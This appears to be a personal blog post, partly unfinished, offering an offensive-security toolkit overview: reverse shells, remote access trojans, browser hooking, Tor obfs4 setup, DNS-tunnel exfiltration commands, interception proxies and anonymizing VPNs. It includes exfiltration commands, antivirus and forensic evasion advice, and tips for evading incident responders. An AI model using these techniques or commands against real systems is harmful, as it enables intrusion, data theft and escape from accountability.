This is a active work in progress and will be updated over time.
In this article, I am trying to provide a comprehensive, all-encompassing guide to the usage of bind and reverse shells, and selection of Remote Access Trojans, and the covering of your tracks of it’s usage, as well as a plethora of other tools you might desire to pass-the-hash, pivot, establish rogue DNS and DHCP servers, etc.
Basically, I am trying to fill up your “Pentester’s Breaking and Entering Bag”. It will be updated as time passes by and new tools show up and others no longer get validated, or if it becomes deprecated.
- A reverse shell in each language and framework
- Table of preferred methods to attack a operating system
- Remote Access Trojan Examples
- Miscellaneous: Tunneling tools, proxifiers, proxies, VPNs, exfiltration tools, DNS encryption, obfuscators, web application pentesting toolkits, experimental transports, static binary analysis tools
Reverse shell in each language and framework.
Server-Side Languages and Frameworks
Ansible (research this)
Ruby on RAILS
Java & JSP & Web Application Resource Files (WAR)
Server Message Block
Client-Side Languages and Frameworks
Netcat and Socat
C, C++, and Objective-C
Remote Desktop / VNC
Dynamic Link Libraries (combined)
Table of preferred RATs and reverse shells to use against each operating system
Windows 10 – Powershell, VBScript, WScript, Java, Python compiled with pyinstaller, Word/Excel Macros, pe32, Payload embedded images, wmv files with hidden octet stream as reverse shell, reflective DLL injection, Remote Desktop
Linux – Bash, awk, curl, ELF, Java, Python, Ruby, netcat, nodejs, php, SSH, telnet, VNC, Apache Struts, Apache Tomcat
MacOS – Python reverse shell compiled into a usable microkernel object via py2app
Remote access trojan toolkits
Rapid7’s Metasploit Framework is not well known for it’s discreetness. It’s almost guaranteed that any payload generated via msfvenom or msfconsole will assuredly be caught, even by Windows Defender. It’s recommended to at least obfuscate the resultant payload and hide the file’s intentions, such as embedding it into a GIF file on a web page and then executing it via HTML, or use a PDF file format exploit. or host a rogue JSP web app with Apache Tomcat.
However, the Meterpreter RAT does have it’s few advantages
- The developers have practically applied every single concept into preventing the leak of forensically identifiable information due to “stupidity” of the malware’s operator, it doesn’t touch the disk unless it has to
- Numerous pivoting options and session-passing modules are available
- Arguably the BEST session management and lateral movement user-interface to grace a pentesting framework (this is further expanded by Armitage and it’s for-pay equivalent, Cobalt Strike)
- Able to generate a payload in practically every binary format, architecture, framework, programming language, compressed file format (APK, WAR, ZIP), and even for embedded devices like routers, as well as command line interfaces such as /bin/sh and /bin/bash, as well as SSH, Telnet, awk, netcat, and curl.
- Features both payload encoding and stage encoding to further thwart detection attempts
- Traffic can be concealed with the use of a TLS certificate in conjunction with the HTTPS transport option
- The framework itself comes pre-loaded with nearly a decade of documented exploits (although your mileage may vary if your victim doesn’t use Windows 98 Second Edition)
- Can interact with customized Powershell modules such as PowerSploit and Nishang
- The output payload files can be further enhanced with Veil-Evasion and the Veil Framework to disguise the nature of the program (although no malware, even if loaded in-memory is safe from analysis by Volatility)
In general, at least to a simple pentester, Metasploit will simply be a tool in their arsenal. However Rapid7 has established itself in the effectiveness of it’s products, and Metasploit Pro subscriptions offer a intuitive web GUI to manage multiple victim sessions at once as well as easy point-and-click pivoting and post-exploitation.
Obviously, for such a huge perk, the carrying value of a Metasploit Pro subscription runs up to $20,000.
However, there should be a major distinction stated between Meterpreter, which is MSF’s premier Remote Access Trojan, and the standard Command Shells and Sessions that Metasploit regularly can spawn. A Remote Access Trojan is a specially designed rogue application that often builds more features on top of a simple reverse shell session. RATs introduce features such as keylogging, screen captures, user and privilege management, credential collection, certificate authority management, persistence, and if higher privileges are gained as a Remote Access Trojan, such as acquiring SYSTEM or DOMAIN or ROOT privileges… a uniquely designed RAT may be able to tamper with the Linux or Windows boot process, allowing themselves to be loaded into memory on startup BEFORE the host operating system and thereby evading detection.
Now that being said, there is nothing special about Metasploit’s Command Shells, these are merely shell sessions and nothing more. Shell sessions can be spawned mutually using netcat, telnet, SSH, and SMB. Or through clever redirection of the elements of the Linux kernel using commands such as bash and awk. Sometimes shells can spawn due to flawed PHP web applications, or if a user input field on a website accepts SQL statements.
You do not need Metasploit to spawn a reverse shell or a bind shell. That’s the point I am trying to get at. But it is this initial foothold that rapidly opens up new opportunities of post-exploitation, and the possible execution of a dedicated and destructive Remote Access Trojan.
Pupy is originally written in Python, but as time passed, it incorporated elements of C, C++, and Golang to continually expand it’s ever growing library of capabilities. On paper, Pupy RAT’s capabilities is already quite impressive
1. Asynchronous operation, much like Cobalt Strike’s Beacon payload
2. In-memory execution via a Powershell one-liner
3. Multiple pluggable transports that can be stacked on top of one another, including the coveted Scramblesuit transport and obfs3
4. By itself, capable of targeting many common platforms, including but not limited to, Linux, Windows, Android, Unix, Apple (Python payload only, must be converted via py2app)
5. Can be made on-the-fly in a multitude of formats, including Windows PE32, Python apps, Linux ELF binaries, malicious DLL files, Android APK zip package, Python interpreter one-liners, and Powershell one-liners
6. Has a variety of pivoting options, multiple agent-session management, and host discovery once a initial foothold has been gained.
7. Credential collection, keychain breaking, and hash dumping are incorporated in what is possibly the easiest and most straightforward CLI command ever.
8. Because of it’s Open-Source nature, the direction of development of the framework is unpredictable and therefore, makes it harder to detect and counter by the Blue Team. On almost a weekly basis, new exploits are constantly being implemented to keep Pupy at the very bleeding edge of effectiveness.
3. Empire/Powershell Empire
- Numerous delivery mechanisms, whether it be a console/interpreter one-liner, a compiled binary, a browser sandbox escape exploit
- Since it’s initial origins as a framework targeting Powershell-enabled Windows 8.1/10 systems, it greatly expanded it’s ambitions towards targeting Apple, Linux, and Android devices
It is however, a bit difficult to use. It is highly recommended that you watch a few guides first on it’s proper usage. Instead of payloads or “sessions”, any incoming connections from distributed malware is known as “active agents”.
The inception of Sharpshooter came from a small firm of pentesters named MDSec that wanted a framework that can quickly generate and obfuscate executable C# code during their engagements.
Sharpshooter isn’t that much of a pentesting framework or Metasploit as much as a quick workaround for the delivery of malicious binaries written in C# through a multitude of creative methods.
As of 2019, Sharpshooter originated payloads are detectable by Windows Defender. But prior to this, and it’s public release on GitHub, Sharpshooter had a ton of clever delivery methods
- HTA Word Documents
- Visual Basic Script
- Windows Script File
5. Veil-Evasion and Veil Framework
Weevely bills itself as a “weaponized webshell” and usually is not the first tool you pull out at the commencement of a pentest. Rather, you leave the webshell on a compromised webserver to allow yourself a easy backdoor inside.
Weevely sessions can be password protected, and installed on any web server that supports PHP.
- Weevely can open it’s own unique HTTP proxy
- It can also spawn it’s own Meterpreter session
- If privileges have properly been escalated (due to file permission/directory faults), Weevely can perform SYSTEM level commands much like your standard root shell
- Weevely understands commands in both /bin/sh and PHP syntax
- It comes with it’s own vulnerability scanner that audits the file and user permissions of whichever webroot directory it was inserted at, looking for a chance to escalate it’s privileges due to negligent webserver management
- The ability to spawn direct bind and reverse TCP shells (remember our chat about reverse shells versus RATs?)
- It comes with it’s own SQL command console for SQL-injectable hosts
- It can execute shell commands as standard user, sudo user, and PHP interpreted commands
- With sufficient privileges, it can enumerate the networking interfaces of the injected host
- And finally it can remotely retrieve, or exfiltrate files
Even I use webshells, and not in a bad way. I keep it as “insurance” in the event that my primary webpage, listerunlimited.com gets hacked and compromised. Somewhere hidden on the front page in obfuscated text, lies my password protected webshell that serves as my backdoor that can immediately grant me root access to my webserver in seconds. I installed it to prevent myself from being locked out in the event of a breach and to prevent my server from being hijacked.
8. BeeF Framework
If you were wondered what a reverse-shell would do, if all it had was access to a victim’s web browser, here you go. Take a spin for yourself, start up BeeF and make a .html page with a <script> tag pointing to <script src=http://127.0.0.1/hook.js>, then load that page in Firefox, and then look at the Web Developer Console.
You’ll quickly notice that a synchronous web application session has started, with near constant communication between hook.js and your web browser. As long as the browser tab is NOT closed, then the attacker will be able to see you on their web GUI and can…
- Spawn phishing pages to trick you into giving up your Facebook password (or Google, or Apple, etc.)
- Start cryptojacking cryptominer sessions on each infected tab
- Migrate to another opened browser tab
- Triangulate via WLAN geolocation the victim’s approximate GPS coordinates
- Generate a HTTP or SOCKS proxy in the instance of the infected browser tab, allowing the attacker to view your internal network from your perspective
- Send crude phishing messages in order to trick the user into abruptly releasing the attacker from the browser sandbox
- Escape the sandbox by tricking the user into downloading and installing the real Remote Access Trojan binary
- Collect saved cookies, login credentials, and passwords from the browser keychain
- View your browsing history and access your browser cache
- Swap any static images that you are loading with infected images, prior to the loading of the page, and by the on-load event, the binary hidden in the image is executed (works on PNG, GIF, JPG and WEBM files)
- Turn on your webcam service
- Auto-load the browser autopwn module from Metasploit (very bad news if you actually have a vulnerable browser, dated 5 years ago)
- Fingerprint the User-Agent, Browser patch information, and attempt to cater a exploit to a specific browser version
- Change the URL in the address bar
- If the beef hook manages to land on a Apache 2.0 webserver, or a JBoss Java Full Stack webserver, then with a specifically crafted JSP page a reverse shell can be spawned directly in the box, allowing the attacker to escape the sandbox
- Restart your PC
- Wipe your browser cache
- Kill every instance of your browser, including minimized tabs
Going back to the “browser sandbox”. In general, a web browser is a “terrible place to be born in” as a shell session. You have the lowest possible privileges in the system, your actions are constantly being patched and audited for illegal requests and activities. It is imperative that once you open a BeeF session on a victim, that you should immediately find any means to “escape the sandbox”. It practically is, reverse-shell hell.
Some innovative ideas include, if attacking a local wifi network, combining the usage of ARP spoofing with BackDoorFactory to allow the “patching” of malicious payloads into legitimate files downloaded by other clients right off the wire, allowing them to execute as soon as the victims consent to opening the files (that they don’t know are infected).
9. Service Workers (In General)
What is a Service Worker? A Service Worker is a web application that persists within your browser and is on it’s way to be supported/adopted by all of the major web browsers today.
Normally Service Workers are well-intentioned. But Service Workers can also be targeted by attackers through trickery to load invalidated code much like a injection flaw.
And then, there is another type of service worker. The Evil Service Worker. Service workers have great potential to expand a malware’s persistence even if the victim closes the tab, and the browser.
See the MarioNet malware example: https://www.zdnet.com/article/new-browser-attack-lets-hackers-run-bad-code-even-after-users-leave-a-web-page/
I remembered my first lesson on Service Workers when I was under the Google Challenge Scholarship. At the time, Service Workers were abuzz with optimism
- You can use Service Workers to minimize bandwidth consumption on streaming videos by having it do a portion of the buffering
- Service Workers can reduce the effect of constantly dropping connections (although I don’t agree, I feel you should just fix the damn ISP’s service)
- Service Workers can serve useful reminders like your Facebook message popups in Windows 10
- The security of Service Workers were considered and because of that, it can only run in HTTPS
- Service Workers can pre-fetch web content before it comes into view to better enhance the user experience
At the time, I saw a darker side to this seemingly awesome, revolutionizing idea. If Service Workers can be hacked themselves, or if they can be used to pre-load malware stages and reconstitute a payload, then it should be imperative that you should disable Service Workers on both desktop and mobile versions of Chrome and Firefox.
During the Scholarship, I quietly voiced my concerns, it got blown off, and I let it go.
Service Workers, if properly abused… https://developer.mozilla.org/en-US/docs/Web/API/Service_Worker_API/Using_Service_Workers
- Can continually “reanimate” themselves using the Web Push API after the browser is closed and restarted
- Service Workers can support cryptominer code such as coinhive, unless you explicitly go through your browser settings and manually examine the service worker, you wouldn’t know anything aside from your mobile phone’s CPU getting really hot and slow
- After the initial launch stage (stage one) of the Service Worker, persistence modules will kick in and the malware will switch transports (from HTTPS to websockets) to communicate back with C2 (Command-and-Control)
- Closing the tab of the attack site, OR, navigating away from it, will not kill off the evil service worker
which would require a additional event to carve the code out of the section of the sqlite databaseHmm, apparently I was wrong. Standard service workers have a cache.open() method that actually is a new concept called a Promise. In other words, create a Promise to open the service worker’s cache and have it reconstitute the payload at a later date.
- In additional to the Service Worker’s cache, it also has optional access to localStorage and IndexedDB for additional storage sections to hide payload stages in.
Scramblesuit and Obfs4proxy are basically siblings. The ultimate difference is that Scramblesuit is slightly more secure and Obfs4 is slightly faster. Eventually Scramblesuit got shelved in favor of Obfs4, and as of this day, it remains the best obfuscating pluggable transport that the Tor network has to offer.
If you really are up to no good, you’ll be pleasantly surprised that with obfs4 properly configured, your network traffic will be rotating and appearing to be VoIP calls, email exchanges, online gaming on the XBox, YouTube streaming video, instead of your more incriminating network traffic, Darknet “Red Rooms”. Or whatever floats your fancy.
When you install a stock Tor installation on Linux, you are actually using the more popular obfs3 pluggable transport. If you installed Orfox on Android, you are using meek pluggable transport.
Now the Tor project has their own reasons of why they kept you as a user downgraded (probably not enough obfs4 relays publicly available, you can go run one yourself), but I am here to tell you, that right out of the box, your Tor session is not as secured as you might desire.
apt-get update && apt-get install -y tor obfs4proxy torsocks tsocks proxychains
Get your free obfs4 bridges online
Enter the captcha and get your randomly chosen bridge information. Most of the people that operate the obfs4 servers are paying out of their own pocket as volunteers.
At the bottom of torrc
Enable the use of bridges
Set the binary for obfs4proxy in torrc
ClientTransportPlugin obfs4, scramblesuit exec /usr/bin/obfs4proxy
Add your bridge configuration
Add the word “Bridge” and then a space and the rest of the line. For example…
obfs4 184.108.40.206:9904 E25A95F1DADB739F0A83EB0223A37C02FD519306 cert=j530B23jE9LX81BOl/cqdjaTVMOXSjPDxevcwq6jKVvnDgvQk/4Gsqfmnc8/wAFzAqtRWg iat-mode=0 obfs4 220.127.116.11:36693 6DB3073771FAE9A49C2DDBDA84E3F150007E7E6A cert=aIMKw+in93NYz9imrFxmGoS4ivVBV0AkbW4GjfPKi85HoWwouUegHYhWFhmLcsrDbsq1WQ iat-mode=0
Bridge obfs4 18.104.22.168:9904 E25A95F1DADB739F0A83EB0223A37C02FD519306 cert=j530B23jE9LX81BOl/cqdjaTVMOXSjPDxevcwq6jKVvnDgvQk/4Gsqfmnc8/wAFzAqtRWg iat-mode=0 Bridge obfs4 22.214.171.124:36693 6DB3073771FAE9A49C2DDBDA84E3F150007E7E6A cert=aIMKw+in93NYz9imrFxmGoS4ivVBV0AkbW4GjfPKi85HoWwouUegHYhWFhmLcsrDbsq1WQ iat-mode=0
Start Tor Service and obfs4proxy
Be sure to start Tor as a init.d service. That’s the only way it’ll automatically run obfs4proxy alongside it.
service tor start
And then check the status to make sure it properly started, service tor status
Normally in Kali Linux at least, the listening port for Tor is port 9050 and is a socks4 proxy. You do not need to pay any attention to the obfs4proxy service that is listening on a different port, everything going through Tor is going through obfs4proxy.
Configure Proxychains, and fix it’s static nameserver setting
Edit /etc/proxychains.conf or /etc/tsocks.conf and add
strict_chain socks4 127.0.0.1 9050
Since we are using proxychains, the current version in the Kali repo has a OUTDATED DNS server address, it’s located in
and you will need to edit it and change 126.96.36.199 to 188.8.131.52
Proxychains is kinda funny. It doesn’t use the now-common Tor method of resolving DNS queries through onionland (which is to make the last hop resolve the hostname, according to the latest Whonix method of resolving domain names).
Instead, it uses a static nameserver as a setting. But 184.108.40.206 hasn’t been active in years, and that is why everyone keeps seeing the error “timed out” when they try to proxychain their commands.
However, apparently the people who discovered the faulty nameserver fact never chose to disclose that issue to the rest of the public. Jerks.
Then try browsing the web, proxychains firefox google.com
Or run a nmap command, proxychains nmap -sT -Pn hostname
All with tcpdump -i any -w test.pcap -vv running, to ensure that your real IP is not being revealed
3. Iodine and DNSTunnel and DNSCat
Option #1: Iodine DNS Tunnel
Iodine creates a DNS tunnel by using your modified DNS providers A, and NS records to allow a anchor point to resolve to a remote server. It’s preferable that whoever is the server that is maintaining this DNS tunnel be endowed with dynamic DNS.
From your DNS settings
- Create a A-record named “tunnelhost” pointing to your remote server’s origin IP
- Create a NS-record with the subdomain “tunnel” pointing at “tunnelhost.domain.com”
You do require a actual domain name to use Iodine, so hopefully whatever domain you choose doesn’t contain your name or company. And from that TLD, you are required to create a subdomain, which acts as the “mailing address” for the DNS tunnel.
Now activate your DNS tunnel.
DNS Tunnel Setup From the server
iodined -c -f localtunnelip -P password tunnel.domain.com
DNS Tunnel Setup From the client
iodine -I 50 -f -P password tunnel.domain.com
Once the tunnel is established via Iodine with a authenticated password and destination subdomain, a tun0 device is formed with its own local IP address and the remote destination is pingable.
You should be able to run ping localtunnelip as long as tun0 is up.
SOCKS5 Proxy-Tunnel inside the DNS Tunnel
You can log back in via SSH through the tunnel to command the remote server by ssh user@localtunnelip or you can create a SOCKS5 proxytunnel through the DNS tunnel with ssh -NfD 1080 user@localtunnelip.
Then, you may edit /etc/tsocks.conf or /etc/proxychains.conf and change the last line to socks5 127.0.0.1 1080 and chaining mode to strict, and whenever a command is proxychained, it will travel through the proxy entry point 127.0.0.1:1080–>user@localtunnelip:53
File Transfers using SSH, RSync, and DNS Tunnels
Or alternatively, lets assume that localtunnelip = 10.0.0.1 and user = root, and you want to get some exfiltrating done.
scp -r $HOME/loot.zip email@example.com://root/Downloads
rsync -r $HOME/loot.zip firstname.lastname@example.org://root/Downloads
It’s important to know that DNS tunnels are painfully slow, averaging the 500ms range in pings and should be reserved for exfiltrating critical files.
Option #2: Bring-Your-Own Makeshift DNS Tunnel – OzymanDNS, no more monkeying with A and NS records and screwing up your website’s DNS settings
This repo is the closest thing I have seen to the original OzymanDNS Perl script. But basically OzymanDNS made it possible to create a DNS Tunnel Server on a local area network device, and then was able to login or transfer files to it by referring to its hostname.
Now, let’s assume we want to transfer our loot.zip file, REMOTELY. And that REMOTE AWS EC2 Instance has a public IP address of… 220.127.116.11 After you install dnstunnel, configure dnstunneld.wrapper with the following info:
In this method, any SSH command can be optionally sent through the DNS tunnel by adding -o ProxyCommand=”dnstunnel sshdns.tunnel.exfil.com” to it
Login through DNS Tunnel
ssh -C -o ProxyCommand=”dnstunnel sshdns.tunnel.exfil.com” email@example.com
SCP through DNS Tunnel
scp -o ProxyCommand=”dnstunnel sshdns.tunnel.exfil.com” ~/tmp/loot.zip firstname.lastname@example.org://$HOME/Downloads
This guy deserves more stars. Please give him a star.
Note: According to the script code, it appears that you have to refer to the tunnel that you are interacting with as “sshdns”, the DNSHOST parameter is just a hostname like in your /etc/hosts file
SimpleVisor is quite simply, the most basic possible VM Hypervisor imaginable. SimpleVisor is unique in that it was optimized to work with Windows NT type architectures and not the standard Linux/Unix-focused hypervisors, as how the author put it, “There is enough of them already” (such as KVM, Xen, VMWare, Virtualbox).
SimpleVisor is a handy tool in hyperjacking and is minimalist and crude in code, only numbering several hundred lines. By installing SimpleVisor BENEATH the original hypervisor (or outright replacing it), you can control of the host. Or alternatively, you can install SimpleVisor on TOP of the original hypervisor, forcing the owners to interact with a phony UI. The act of this is known as hyper-jacking, and it’s the equivalent of stealing a rig right out of a datacenter under their noses.
Proxychains and tsocks are both known as transparent proxifiers. Their purpose is to “proxify” non-proxy-aware applications if possible (some apps and programs do not fully support transparent proxification, such as a nmap SYN scan, or certain Metasploit modules).
A proxified app that is being interacted with by either proxychains or tsocks will automatically run their next command through the predefined proxy, whether it be SOCKS4, SOCKS4a, SOCKS5, or HTTP.
The difference between proxychains and tsocks, is that tsocks only works on a single proxy defined in /etc/tsocks.conf. Meanwhile, proxychains can work with multiple proxies, defined either as a strict ordered chain to travel, or as a dynamic chain where inactive hosts in the chain are skipped, or as a random chain where the command that is run with proxychains is conducted via multiple randomly chosen proxies (to test the effectiveness of IDS evasion).
Both however, support authentication, which is available in both SOCKS5 and HTTP proxy servers.
SSHuttle aspires to simplify the formation and breakdown of SSH tunnels without convoluted commands and steps such as SSH-ing to each hop and enabling port-forwarding and gateway ports, and then drafting and constructing a diagram of the tunnel like SSH -L 8080:localhost:7070 -NfD 1080 user@remotehost -p 22, repeatedly.
While I consider the app to be pretty shoddy in it’s effectiveness, it will however, “brute” every possible opportunity in a compromised target’s network settings to permit the formation of reliable SSH tunnels, albeit it takes a while.
It will always attempt to gain root or at least a sudoable user to build the SSH tunnels with, but in general, after launching SSHuttle, you should expect 15 to 30 minutes before you will hear back from the bot.
Often, it’s useful to allow the bot to do it’s thing while you are busy expanding your initial foothold in a breach.
Ncat is the nmap team’s take on the popular networking Swiss Army Knife, with a few more features.
- Ncat (not netcat or nc), can form both SOCKS5 proxies and HTTP proxies
- These proxies are complete with full DNS resolution and authentication
- All of the proxies are compatible with tsocks and proxychains and other transparent proxifiers
- It is both TCP, UDP, and SCTP compatible and supports both IPv4 and IPv6
- It supports SSL authentication and file transfers
- Ncat also can set specific access control policies to ensure that whatever proxies ncat forms, remain useful only to the attackers instead of the responders
- Ncat is a usable argument when chaining SSH’s proxycommand features
- Ncat can also “bridge” itself as a SOCKS4 proxy-tunnel with a SSH tunnel while still using a proxycommand at the end of a task, much like proxy-chaining
- The app can also transform itself into a simple webserver much like ‘Python -m SimpleHTTPServer’, and can perform the role as a makeshift email client, and host rudimentary “chatrooms”.
As demonstrated in my Cybrary article on “Decrypting SSL/TLS Traffic via a Man-in-the-Middle Attack”, Squid is invaluable as a intercepting-attack proxy that can decrypt and reencrypt TLS web traffic in real time, while forging session keys on both ends, using it’s SSL-Bump feature. SSL-Bump is not enabled by default and you must compile from source with that option enabled.
Assuming you have gained a man-in-the-middle attack position, for example, running a rogue wireless hotspot with HostAPD, DNSMasq, udhcpd, and with your victims trusting you as a gateway, you can use iptables to forward all traffic originating/destined to ports 80/443 over to port 3128, the attacking Squid proxy.
If the idea of leaving port 3128 open on your machine as suspicious, then you can use socat to create a TLS-authenticated relay, so you look like a legitimate router.
Features of Squid include the ability to temporarily cache content that has been decrypted and intercepted, as well as being able to inject malicious traffic in real time with the use of a ICAP Server such as bitz-server.
Socat is basically netcat with significantly expanded capabilities. On top of being able to pass shell sessions and perform basic networking tasks, it can
- Open multiple TCP/UDP sessions in both IPv4 and IPv6
- Authenticate and verify users via SSL/TLS certificates and keys
- Function as a relay (much like a netcat relay)
- Or function as a crude server
- Operate as a proxy
- Run shell commands
- Grant access to pseudoterminals
- Write to file descriptors
- Create a persistent listening service
- Form a SOCKS4 and SOCKS4A proxy server (the socks4a server is capable of resolving DNS requests with a few set parameters)
- Directly read/write to/from stdin, stdout, and stderr
11. SSLstrip, SSLsplit, SSLdump, SSLproxy
In Kali Linux, both SSLStrip and SSLSplit should be installed by default with the Kali Linux wireless hacking packages. If not, then apt-get update && apt-get install -y mana-toolkit hostapd dnsmasq sslstrip sslsplit
The important parts of this section is simply SSLStrip and SSLSplit. Think about the differences of the names for a moment before we go on.
- SSLSplit prevents crucial data from being encrypted in the first place
- SSLStrip decrypts ciphertext using a key that the victim was tricked into using
When running a rogue access point, it is essential to have both of these at the minimum. However this is the year 2019, and we already obsoleted SSL in favor of TLS, although everyone keeps calling it SSL for some reason.
SSLDump allows you to…
- Decrypt packets in real time with or without a given key
- Decrypt a previously captured packet capture file .pcap using a key or no key
Obviously, with the actual key, your odds of success will be greater. Otherwise you would only be able to decipher your half of the conversations and anything that still is being transmitted in standard HTTP.
And finally, SSLProxy is a github project that claims to dramatically improve on SSLstrip and SSLsplit.
Also note. If you are making a rogue hotspot with mana-toolkit, your SSLstrip and SSLsplit conversations generated by your victims are in two static logs located in /usr/share/mana-toolkit directory
13. Binwalk, objdump, gcc, strings, file
This is more of a forensics and “cover-your-ass” advice than anything for pentesting. Basically, we need to validate that our malware that we created, has little if any forensically identifiable information that can be traced back to us. This will at least improve our odds against static binary analysis.
- Use the strings command to parse out readable strings from a compiled ELF or PE32 binary. Make sure that it doesn’t have your listener server’s IP address in plaintext, or that you have dynamic DNS set up instead. Make sure that there is a encryption key at the start of the line, and the rest of it is ciphertext containing malware code. If your malware is intended to use web functions, it should have base64 encoding.
- Use Binwalk to analyze specific sub-portions of a binary file, such as strings, or a embedded file format or image, all of which either you or the forensic investigator can extract. Furthermore, if you have encoded the payload in multiple iterations using msfvenom, you need to use Binwalk’s entropy analysis, or binwalk -E payload.elf to view the quality of the encoding. Binwalk generates a yellow entropy graph showing the “randomness” of the data along the scale. However, if you see three or four tall, perfectly-sized rectangles, that is a obvious giveaway that the binary has been encoded in multiple iterations. It may or may not be easily detected, since the goal is to appear as natural of a file as it can be.
- The File command is pretty damn obvious. It’ll ascertain the type of file based upon the binary’s initial “magic bytes”. The only purpose of magic bytes is to simplify identification of a binary and to determine what architecture is required to run them. So running File against a .elf file will tell me its a Linux compatible binary and is executable, likewise running File against a .exe file will tell me that its a Windows Portable Executable-32 binary, that’s the most common form of executable that we have been running on Windows since we were kids playing Starcraft on Windows 95.
- Use objdump to…
- Either generate i386 shellcode in 32-bit instruction sets
- Or observe the Assembly opcodes and ascertain that the intent of the binary payload “isn’t too obvious” to a virus scanner
- Break down a compiled binary into either a Assembly object file, or a set of Assembly opcodes, or to observe the linking process that occurred during compilation
Assembly is pretty hard to understand but there are a few glaring operators that you should watch out for.
JMP = Means JMP to a instruction, usually it is another section of the program
CMP = Means COMPARE, or basically, a if-and-then-else-if statement
CALL= Makes it obvious, it calls a function at a memory address
MOV = Moves the value of a memory address into a register, this often comes with a offset value as well
AND & OR operators = Conditional statements often combined with something like CMP
XOR = “Exclusive Or”, it is one of the most primitive methods of obfuscating malware code
DWORD PTR = “Double-word Pointer”, this is combined with another instruction, but basically pointers are a object that is unique to C and C++ and permits memory manipulation and allocation. In more abstract terms, that is, higher-level programming languages, a “pointer” is similar to a “variable” but NOT as limited. Pointers can point to a object’s value, or the memory address of that object, or even the pointer object itself.
POP = Pops the value at the memory address off the stack and pushes it into the instruction register
It’s important to understand all of these concepts at a minimum. For example, if I see a POP instruction, I just learned that a segment of code has just been loaded into the EAX register, which means it’s going to be executed next. Same thing goes for CMP, or LOOP, I can vaguely ascertain that there is a comparison of a boolean expression or the value of two integers or something, and LOOP is similar to a Python While-Loop until the condition is satisfied that breaks out of the loop.
Learn Assembly and the Intel opcodes. You will not regret it and its not a waste of time.
Parprouted stands for Proxy ARP Routing Daemon and it maintains it’s own dynamically altering (as default) ARP table for “crude band-aid networking purposes”. The Daemon itself is just a dumb bot that forwards frames to it’s intended destination as stated by the table.
However there are a few things that make parprouted unique
- Through the magic of the forwarding Proxy ARP Daemon, you can link a subnet connected to your wireless card, to a subnet connected to your ethernet card, and then have them mutually communicate and ping each other
- This affords new opportunities to attack for physical pentesters, as all a team has to do is to (a) Break in (b) Hack into a Linux machine (c) Insert a external USB wifi card (d) Use parprouted to link the Wi-Fi card to the physically connected Ethernet network and (e) Remotely connect to a generated hotspot on that workstation with a Parabolic Antenna to continue hacking completely out of sight and notice
However, the Proxy ARP Daemon is still prone to being fooled, particularly if a flood of invalid ARP requests are sent towards the listening daemon. The service will continually loop and attempt to forward undeliverable frames, eventually crashing from the deluge of faulty requests.
A semi-fixable solution is to use the -p option and set the ARP entries permanent, as the table will still not clear even if the host has already left the network. But also, the ARP entries will not update either, freezing the effect of the flooding attack.
RPivot is a proxychains-compatible SOCKS4 proxy that acts as a reverse-proxy. Imagine that you broke into a jewelry store, and your heist crew is nabbing the goods and putting it into a secure bag. Soon they all start passing you the loot bags so you can pile it into the getaway vehicle.
RPivot is unique in that it is a locally run SOCKS4 proxy that is designed to support passing-the-hash, pivot offensively via a NTLM proxy by proxy-chaining to the proxy first, then to a targeted victim, as well as tunneling traffic like a standard SOCKS4 proxy. RPivot can be used both evasively (exfiltration) and offensively, much like SSH pivoting can be done via proxychains and the ssh -NfD command.
Please be aware that this is merely a standard SOCKS4 proxy. It cannot support authentication, and it does not support DNS resolution. If you need DNS resolution, consider using Metasploit Framework’s socks4a server module or use the SSH command.
Routersploit is like a Metasploit-Framework solely for the auditing and compromising of the security of routers and other embedded devices on SOHO (Small Office, Home Office) networks. Among it’s features is…
- A hands-on interactive mode if automated exploits fail
- Multiple password crackers that brute force protocols ranging from SSH, Telnet, SOAP, to HTTP router login pages
- A router “autopwn” feature, where it will test every single exploit that it knows in order to determine whether or not you can immediately own the Administrator password
- The ability to spawn reverse shells in multiple embedded device architectures such as MIPSLE, ARMLE, and ARMBE. as well as via /bin/bash, /bin/sh, and /bin/ash or /bin/dash and awk.
- A handful of exploits targeting IP Cameras and Internet-of-Things devices commonly found attached to routers
Routersploit requires you to crack the initial WPA2-PSK before use (aircrack-ng suite and hashcat). Or at least to know of it. Once you are logged in, just set TARGET to 192.168.0.1, or 10.0.0.1 and run the autopwn module for starters.
17 Responder and mitmf
18. Wireguard, OpenVPN, IPSec, Tor, Shadowsocks, obfs4proxy, stunnel4 and Cisco Anyconnect
If you want to stay evasive and ahead of the curve against pursuing incident response teams and Blue Teamers, you need to be able to pull every trick out of your hat to obfuscate, encrypt, and alter the nature of your network traffic. And the first step to doing that, is to conceal your actual online identity, your IP address and your online handle.
This section is meant to be used in conjunction with #19, Streisand Framework
You will need to install (right now)
- Wireguard to have client-side access to a bleeding-edge VPN service that is purportedly faster than IPSec. All it requires is a remote VPS server (provided by Streisand below), your client laptop, and the sharing of the symmetric keys.
- OpenVPN as a backup and time-tested and reliable method of establishing a VPN connection
- IPSec, also as a time-tested backup, and also that it Information Technology’s top choice when it comes to end-to-end encryption and security. Be sure to enable ESP, or the Encapsulated Security Payload feature as soon as you set it up
- Tor is a obvious choice, if all other measures have failed you. Note that approximately a quarter of all Tor exit nodes have been compromised by some three-letter agency, the FBI for example.
- Shadowsocks to help disguise your traffic and get it past restrictive firewalls. Wrapping a OpenVPN connection with Shadowsocks is a relatively easy modification to your OpenVPN .ovpn profile
- Obfs4proxy to take advantage of the latest in Encryption/Obfuscation provided by the Tor project. Not many know this, but the standard desktop version of Tor only supports obfs3, or in the case of Android, the meek standard if you do not customize it. Be sure to also snap up your free obfs4 relay information and keys as well, and modify your /etc/tor/torrc file to allow the use of obfs4 bridges and relays. In comparison between Scramblesuit and obfs4, Scramblesuit was eventually shelved when obfs4 was proven to be faster and still delivered on its promises.
- Stunnel4 is required for those concerned with the basic amount of security that OpenVPN provides. By wrapping your OpenVPN with a SSL Tunnel (stunnel), you lose speed (it’s tcp-over-tcp) but come out with a much more encrypted security posture.
- Cisco AnyConnect is entirely a fallback option in case any of the 7 previous choices have faltered somehow. In my experience, Cisco AnyConnect was the most straightforward method and UI to set up a VPN quickly and to use it.
19. Streisand (remote VPS)
Streisand is a server-automation framework that runs mostly on Ansible. It’s purpose is to spool up and start up your remote Virtual Private Server of your choice, so that it can support the usage of your VPN services. From that point on, as long as your VPN is up, you will assume the public IP identity of the remote VPS that is hosting the Streisand services.
Be sure to git-clone the repository on your CLIENT machine first. That would be the laptop.
Then follow the on-screen directions to automatically spool up a brand new VPS in your IaaS provider of choice (Digital Ocean, Amazon AWS, Akamai Ghost, Vultr, Linode, etc.). Let the autoconfiguration take care of your troubles as it sets the server-side setup for all eight services that I mentioned previously.
